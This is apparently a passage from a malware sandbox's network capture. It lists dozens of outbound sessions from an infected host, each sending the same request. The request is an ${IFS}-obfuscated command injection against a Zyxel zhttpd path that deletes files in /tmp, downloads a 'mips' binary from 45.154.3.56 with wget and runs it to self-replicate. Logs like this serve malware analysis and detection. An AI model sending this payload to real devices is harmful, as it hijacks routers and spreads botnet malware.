                        Mar 12, 2024 08:50:27.042737961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1026192.168.2.143678668.182.123.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042777061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1027192.168.2.1441448204.191.120.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042807102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1028192.168.2.145482242.172.19.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042846918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1029192.168.2.143504466.190.90.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042884111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1030192.168.2.1450196186.48.1.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042932034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1031192.168.2.144974825.48.63.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042989969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1032192.168.2.145973414.44.213.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043044090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1033192.168.2.1449764209.103.155.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043076992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1034192.168.2.144682840.175.96.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043126106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1035192.168.2.145777832.177.204.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043149948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1036192.168.2.1459452112.220.107.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043194056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1037192.168.2.143897083.148.236.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043235064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1038192.168.2.144531687.58.121.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043270111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1039192.168.2.1440304176.242.61.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043314934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1040192.168.2.1455312213.215.111.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043348074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1041192.168.2.143633842.137.66.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043410063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1042192.168.2.1456552222.56.19.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043457031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1043192.168.2.1442978160.36.155.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043490887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1044192.168.2.143844442.29.53.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043540955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1045192.168.2.146077837.176.1.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043590069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1046192.168.2.14550068.27.173.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043620110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1047192.168.2.145177298.218.176.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043684006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1048192.168.2.1437814130.42.44.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043725967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1049192.168.2.145463261.80.167.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043793917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1050192.168.2.1454454101.185.236.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043833971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1051192.168.2.1446472169.121.236.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043873072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1052192.168.2.1434492200.32.114.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043921947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1053192.168.2.1446616130.73.148.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.043967009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1054192.168.2.1459978219.13.28.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044014931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1055192.168.2.1447462154.187.192.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044059992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1056192.168.2.1440260191.84.123.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044087887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1057192.168.2.1447922133.45.42.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044192076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1058192.168.2.1440426133.74.212.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044238091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1059192.168.2.1433770198.185.46.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044245958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1060192.168.2.1437386103.16.196.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044300079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1061192.168.2.1433786152.134.34.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044339895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1062192.168.2.145885875.205.109.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044399977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1063192.168.2.143282249.204.221.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044449091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1064192.168.2.144332660.27.134.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044512033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1065192.168.2.1451568104.42.81.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044536114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1066192.168.2.144239673.248.13.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044590950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1067192.168.2.1450454195.102.232.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044625998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1068192.168.2.1435824223.35.234.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044667959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1069192.168.2.1445876153.240.165.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044720888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1070192.168.2.145586227.126.230.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044759989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1071192.168.2.145148867.133.243.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044823885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1072192.168.2.1454922219.32.226.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044853926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1073192.168.2.1442136185.8.123.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044892073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1074192.168.2.1442664134.103.54.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044944048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1075192.168.2.144593049.48.51.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.044990063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1076192.168.2.1444036104.255.106.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.045026064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1077192.168.2.1441734115.132.42.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.048998117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1078192.168.2.1439634123.179.144.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049032927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1079192.168.2.1441046146.5.10.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049097061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1080192.168.2.143791042.45.81.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049117088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1081192.168.2.1437644144.135.174.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049159050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1082192.168.2.144129477.75.254.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049211979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1083192.168.2.144188235.168.36.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049237967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1084192.168.2.144871467.27.125.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.049289942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1085192.168.2.143931818.210.121.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052052021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1086192.168.2.1452524135.168.162.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052109003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1087192.168.2.1456072176.1.90.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052146912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1088192.168.2.145289457.111.50.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052185059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1089192.168.2.146030695.31.120.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052227020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1090192.168.2.1459786116.178.24.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052248001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1091192.168.2.1460464144.210.82.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052318096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1092192.168.2.143504867.132.53.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052356005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1093192.168.2.144243424.43.110.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052400112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1094192.168.2.144592267.204.158.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052476883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1095192.168.2.1435448210.11.31.197443
